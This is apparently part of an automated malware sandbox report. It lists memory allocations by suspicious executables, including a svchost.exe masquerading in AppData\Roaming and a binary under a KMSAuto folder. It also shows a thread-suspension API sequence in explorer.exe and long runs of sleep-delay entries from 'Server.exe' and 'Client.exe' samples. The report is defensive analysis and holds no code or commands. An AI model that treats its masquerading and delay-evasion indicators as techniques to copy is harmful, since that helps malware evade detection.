Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Memory allocated: 1A7C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Memory allocated: 10F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Memory allocated: 2DD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Memory allocated: 10F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 2800000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 2800000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 4800000 memory reserve \| memory write watch
Source: C:\ProgramData\KMSAuto\accc.exe	Memory allocated: B40000 memory reserve \| memory write watch
Source: C:\ProgramData\KMSAuto\accc.exe	Memory allocated: 1A7F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Memory allocated: 880000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Memory allocated: 24B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Memory allocated: 23D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 33E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 33E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 53E0000 memory reserve \| memory write watch

Source: C:\Windows\explorer.exe

Code function: 2_2_08CB167C CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,FindCloseChangeNotification,OpenThread,SuspendThread,GetThreadContext,SetThreadContext,CloseHandle,FindCloseChangeNotification,

2_2_08CB167C

Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 599125
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 598929
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 598718
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 598515
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 598312
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 598140
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 597953
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 597781
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 597621
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 597421
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 597140
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 596757
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 596578
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 596390
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 596046
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 593578
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 593296
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 593125
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 591156
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 590968
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 590778
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 590593
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 590375
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 590078
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 589656
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 589479
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 589328
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 589140
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 588993
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 588765
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 588600
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 588343
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 588187
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 588015
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 587853
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 587560
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 587265
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 587125
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 586961
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 586781
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 586635
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 586421
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 586218
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 585984
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 585750
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 585585
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 585421
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 585031
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 584812
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 584515
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 584203
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 583843
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 583531
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 583307
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 583112
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 582562
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 582281
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 582078
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 581921
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 581687
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 581423
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 581258
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 581046
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 580862
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 580671
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 580265
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 580077
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 579875
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 579709
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 579492
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 579296
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 578953
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 578484
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 578078
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 577734
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 577484
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 577341
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 577125
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 576937
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 576703
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 576468
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 576318
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 576125
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 575937
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 575781
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 575627
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 599641
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 599359
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 599031
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 598495
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 598168
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 597947
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 597734
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 597453
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 597281
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 597031
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 595184
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 594953
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 594775
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 594615
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 599532
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 599101
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 598610
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 598328
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 598026
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 597719
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 597453
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 597125
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 596500
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 596078
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 595625
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 595110
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 594360
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 593922
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 593500
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 593047
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 592766
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 592438
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 591907
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 591610
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 591313
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 591105
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 590891
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 590575
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 590328
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 589985
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 589413
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 589194
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 588911
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 588672
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 588489
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 588281
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 588047
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 587813
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 587625
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 587391
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 587172
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 586953
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 586719
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 586557
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 586359
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 586177
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 585984
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 585824
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 585625
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 585391
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 585172
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 584946
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 584782
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 584531
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 584297
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 584032
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 583794
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 583594
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 583450
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 583188
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 582969
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 582735
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 582500
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 582324
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 582125
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 581844
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 581625
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 581297
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 580961
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 580750
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 580578
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 580391
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 580102
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 579910
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 579705
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 579500
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 579250
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 579028
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 578688
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 578499
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 578203
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 577938
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 577656
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 577344
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 577094
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 576844
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 576563
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 576282
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 576057
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 575797
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 575578
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 575352
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 575078
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 574813
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 574532
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 574281
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 574047
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 573891
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 573700
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 573469
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 573250
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 573016
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 572828
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 572625
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 572375
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 572125
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 571938
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 571709
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 571469
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 571219
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 571016
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 570813
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 570594
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 570297
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 569907
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 569625
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 569422
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 569227
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 569016
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 568779
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 568618
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 568406
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 568208
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 567719
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 567438
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 567226
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 567031
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 566857
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 566690
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 566496
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 566305
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 566031
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 565828
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 565625
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 565391
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 565183
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 564891
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 564688
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 564514
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 564297
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 564078
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 563844
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 563328
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 563123
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 562906
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 562688
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 562391
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 562195
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 561985
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 561735
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 561516
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 561297
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 561078
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 560860
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 560656
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 560469
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 560282
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 560032
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 559828
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 559632
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 559419
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 559235
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 558907
